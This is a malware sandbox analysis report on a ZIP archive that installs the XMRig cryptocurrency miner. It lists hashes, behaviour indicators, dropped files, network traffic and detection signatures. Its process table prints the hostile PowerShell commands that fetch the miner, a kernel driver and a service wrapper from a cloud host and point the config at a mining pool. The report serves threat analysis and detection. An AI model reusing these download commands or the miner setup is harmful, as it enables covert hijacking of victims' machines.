| File name: | c3pool.zip |
| Full analysis: | https://app.any.run/tasks/24c30a54-6ed4-4a89-900c-742b95145f8e |
| Verdict: | Malicious activity |
| Threats: | A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection. |
| Analysis date: | January 19, 2024, 12:23:05 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/zip |
| File info: | Zip archive data, at least v1.0 to extract |
| MD5: | 25974E8158E9907C4B109F0BC5F2F9B5 |
| SHA1: | 71228C2A649F3F3E7D0EE02DC8608C6ABB759EF5 |
| SHA256: | F96C35F57B6248C640470A2C4790790C33A88110C9FC90CDD3996E021B89DE73 |
| SSDEEP: | 98304:B9v22LwdKvnToJohCSfvOz1WaVFL2h5BD1R9VSM1XZpaa6RzKlKnmZmChhoG8WJY:ZcSRoAe |
MALICIOUS
Drops the executable file immediately after the start
- WinRAR.exe (PID: 128)
- powershell.exe (PID: 572)
- powershell.exe (PID: 2308)
- powershell.exe (PID: 2440)
Request from PowerShell which ran from CMD.EXE
- powershell.exe (PID: 1804)
- powershell.exe (PID: 2308)
- powershell.exe (PID: 2440)
Create files in the Startup directory
- cmd.exe (PID: 268)
SUSPICIOUS
Probably download files using WebClient
- cmd.exe (PID: 268)
Drops a system driver (possible attempt to evade defenses)
- WinRAR.exe (PID: 128)
- powershell.exe (PID: 572)
Reads the Internet Settings
- powershell.exe (PID: 572)
- powershell.exe (PID: 1804)
- powershell.exe (PID: 2308)
- powershell.exe (PID: 2440)
Starts POWERSHELL.EXE for commands execution
- cmd.exe (PID: 268)
- cmd.exe (PID: 996)
Executable content was dropped or overwritten
- powershell.exe (PID: 572)
- powershell.exe (PID: 2308)
- powershell.exe (PID: 2440)
The Powershell connects to the Internet
- powershell.exe (PID: 572)
- powershell.exe (PID: 1804)
- powershell.exe (PID: 2440)
- powershell.exe (PID: 2308)
Unusual connection from system programs
- powershell.exe (PID: 572)
- powershell.exe (PID: 1804)
- powershell.exe (PID: 2440)
- powershell.exe (PID: 2308)
Process requests binary or script from the Internet
- powershell.exe (PID: 1804)
- powershell.exe (PID: 2308)
- powershell.exe (PID: 2440)
Probably obfuscated PowerShell command line is found
- cmd.exe (PID: 268)
- cmd.exe (PID: 996)
Starts CMD.EXE for commands execution
- cmd.exe (PID: 268)
Application launched itself
- cmd.exe (PID: 268)
Probably file/command deobfuscation
- cmd.exe (PID: 996)
Get information on the list of running processes
- cmd.exe (PID: 268)
- cmd.exe (PID: 1168)
INFO
Executable content was dropped or overwritten
- WinRAR.exe (PID: 128)
Manual execution by a user
- cmd.exe (PID: 268)
- notepad.exe (PID: 3424)
- rundll32.exe (PID: 3780)
- notepad.exe (PID: 2932)
- cmd.exe (PID: 1168)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
TRiD
| .zip | | | ZIP compressed archive (100) |
|---|
EXIF
ZIP
| ZipRequiredVersion: | 10 |
|---|---|
| ZipBitFlag: | - |
| ZipCompression: | None |
| ZipModifyDate: | 2023:11:21 17:39:28 |
| ZipCRC: | 0x00000000 |
| ZipCompressedSize: | - |
| ZipUncompressedSize: | - |
| ZipFileName: | c3pool/ |
Total processes
64
Monitored processes
25
Malicious processes
4
Suspicious processes
1
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 128 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\c3pool.zip" | C:\Program Files\WinRAR\WinRAR.exe | explorer.exe | ||||||||||||
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Exit code: 0 Version: 5.91.0 Modules
| |||||||||||||||
| 268 | C:\Windows\system32\cmd.exe /c ""C:\Users\admin\Desktop\c3pool\c3pool.bat" " | C:\Windows\System32\cmd.exe | explorer.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 568 | powershell.exe -Command "$out = gc 'C:\Users\admin\c3pool\config.json' | foreach { $_ -replace '\"user\": *\".*\",', '\"user\": \"\",' } | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\admin\c3pool\config.json'" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) Modules
| |||||||||||||||
| 572 | powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('http://c3poolbat.oss-accelerate.aliyuncs.com/c3pool/WinRing0x64.sys', 'C:\Users\admin\c3pool\WinRing0x64.sys')" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) Modules
| |||||||||||||||
| 984 | powershell.exe -Command "$out = gc 'C:\Users\admin\c3pool\config.json' | foreach { $_ -replace '\"url\": *\".*\",', '\"url\": \"auto.c3pool.org:80\",' } | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\admin\c3pool\config.json'" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) Modules
| |||||||||||||||
| 996 | C:\Windows\system32\cmd.exe /c powershell.exe -Command "hostname | foreach { $_ -replace '[^a-zA-Z0-9]+', '_' }" | C:\Windows\System32\cmd.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 1020 | tasklist /fi "imagename eq xmrig.exe" | C:\Windows\System32\tasklist.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Lists the current running tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 1040 | net session | C:\Windows\System32\net.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Net Command Exit code: 2 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 1168 | C:\Windows\system32\cmd.exe /c ""C:\Users\admin\Desktop\c3pool\c3pool\miner.bat" " | C:\Windows\System32\cmd.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 1172 | find ":" | C:\Windows\System32\find.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Find String (grep) Utility Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
Total events
8 804
Read events
8 784
Write events
20
Delete events
0
Modification events
| (PID) Process: | (128) WinRAR.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\MuiCache\182\52C64B7E |
| Operation: | write | Name: | LanguageList |
Value: en-US | |||
| (PID) Process: | (128) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\ArcHistory |
| Operation: | write | Name: | 3 |
Value: C:\Users\admin\Desktop\virtio_ivshmem_master_build.zip | |||
| (PID) Process: | (128) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\ArcHistory |
| Operation: | write | Name: | 2 |
Value: C:\Users\admin\Desktop\phacker.zip | |||
| (PID) Process: | (128) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\ArcHistory |
| Operation: | write | Name: | 1 |
Value: C:\Users\admin\Desktop\Win7-KB3191566-x86.zip | |||
| (PID) Process: | (128) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\ArcHistory |
| Operation: | write | Name: | 0 |
Value: C:\Users\admin\Desktop\curl-8.5.0_1-win32-mingw.zip | |||
| (PID) Process: | (128) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | name |
Value: 120 | |||
| (PID) Process: | (128) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | size |
Value: 80 | |||
| (PID) Process: | (128) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | type |
Value: 120 | |||
| (PID) Process: | (128) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | mtime |
Value: 100 | |||
| (PID) Process: | (128) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\Interface\MainWin |
| Operation: | write | Name: | Placement |
Value: 2C0000000000000001000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF42000000420000000204000037020000 | |||
Executable files
6
Suspicious files
27
Text files
10
Unknown types
0
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 128 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DRa128.48554\c3pool\Log Files\TeamViewer15_Logfile.log | — | |
MD5:— | SHA256:— | |||
| 128 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DRa128.48554\c3pool\Log Files\TeamViewer15_Logfile_OLD.log | — | |
MD5:— | SHA256:— | |||
| 128 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DRa128.48554\c3pool\Log Files\TVNetwork.log | — | |
MD5:— | SHA256:— | |||
| 128 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DRa128.48554\c3pool\Log Files\TVNetwork_Old.log | — | |
MD5:— | SHA256:— | |||
| 128 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DRa128.48554\c3pool\c3pool\config_background.json | binary | |
MD5:E8FB81E89C669F46EF4C638856A87274 | SHA256:897ADDF8DDB784C8A26E44EFE9C6BB6FB08AFCA8EC26C4A5A15819DA258FE2B2 | |||
| 128 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DRa128.48554\c3pool\c3pool\config.json | binary | |
MD5:A657DF13CF14881403361294027D38CE | SHA256:E47E7172077CA23F66A82F1A45083952B1D6DDDCE44ADDCAB7F77F9243FB72E3 | |||
| 128 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DRa128.48554\c3pool\c3pool\nssm.exe | executable | |
MD5:1136EFB1A46D1F2D508162387F30DC4D | SHA256:EEE9C44C29C2BE011F1F1E43BB8C3FCA888CB81053022EC5A0060035DE16D848 | |||
| 128 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DRa128.48554\c3pool\c3pool\xmrig.exe | executable | |
MD5:93655BAF77E96E0A513285A426BA608F | SHA256:228328CA683A5EDA547A57D37C5EF76BB3AE6F9530346B6280E5236BC1D05ED7 | |||
| 128 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DRa128.48554\c3pool\Log Files\CopyRights.txt | text | |
MD5:BEE0CF8EB0E6B5FE2B216EBA63DE763C | SHA256:4161254F13B5A5326456E71B67B3179203DF162279183F929C8678A6FDC91B49 | |||
| 128 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DRa128.48554\c3pool\c3pool\WinRing0x64.sys | executable | |
MD5:0C0195C48B6B8582FA6F6373032118DA | SHA256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5 | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
4
TCP/UDP connections
5
DNS requests
1
Threats
13
HTTP requests
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
572 | powershell.exe | GET | 200 | 47.254.187.197:80 | http://c3poolbat.oss-accelerate.aliyuncs.com/c3pool/WinRing0x64.sys | unknown | executable | 14.2 Kb | unknown |
1804 | powershell.exe | GET | 200 | 47.254.187.197:80 | http://c3poolbat.oss-accelerate.aliyuncs.com/c3pool/config.json | unknown | binary | 2.52 Kb | unknown |
2308 | powershell.exe | GET | 200 | 47.254.187.197:80 | http://c3poolbat.oss-accelerate.aliyuncs.com/c3pool/xmrig.exe | unknown | executable | 5.28 Mb | unknown |
2440 | powershell.exe | GET | 200 | 47.254.187.197:80 | http://c3poolbat.oss-accelerate.aliyuncs.com/c3pool/nssm.exe | unknown | executable | 360 Kb | unknown |
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
572 | powershell.exe | 47.254.187.197:80 | c3poolbat.oss-accelerate.aliyuncs.com | Alibaba US Technology Co., Ltd. | DE | unknown |
1804 | powershell.exe | 47.254.187.197:80 | c3poolbat.oss-accelerate.aliyuncs.com | Alibaba US Technology Co., Ltd. | DE | unknown |
2308 | powershell.exe | 47.254.187.197:80 | c3poolbat.oss-accelerate.aliyuncs.com | Alibaba US Technology Co., Ltd. | DE | unknown |
2440 | powershell.exe | 47.254.187.197:80 | c3poolbat.oss-accelerate.aliyuncs.com | Alibaba US Technology Co., Ltd. | DE | unknown |
DNS requests
Domain | IP | Reputation |
|---|---|---|
c3poolbat.oss-accelerate.aliyuncs.com |
| malicious |
Threats
PID | Process | Class | Message |
|---|---|---|---|
2308 | powershell.exe | Potential Corporate Privacy Violation | AV POLICY HTTP request for .exe file with no User-Agent |
2308 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
2308 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
2308 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2440 | powershell.exe | Potential Corporate Privacy Violation | AV POLICY HTTP request for .exe file with no User-Agent |
2440 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2440 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
2440 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
572 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
572 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2 ETPRO signatures available at the full report